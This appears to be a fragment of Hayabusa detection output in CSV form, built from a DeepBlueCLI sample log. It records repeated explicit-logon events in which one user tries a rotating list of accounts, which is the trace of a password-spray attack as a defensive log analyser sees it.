+2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: Administrator  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jwright  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dpendolino  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: celgee  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: thessman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: eskoudis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cdavis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
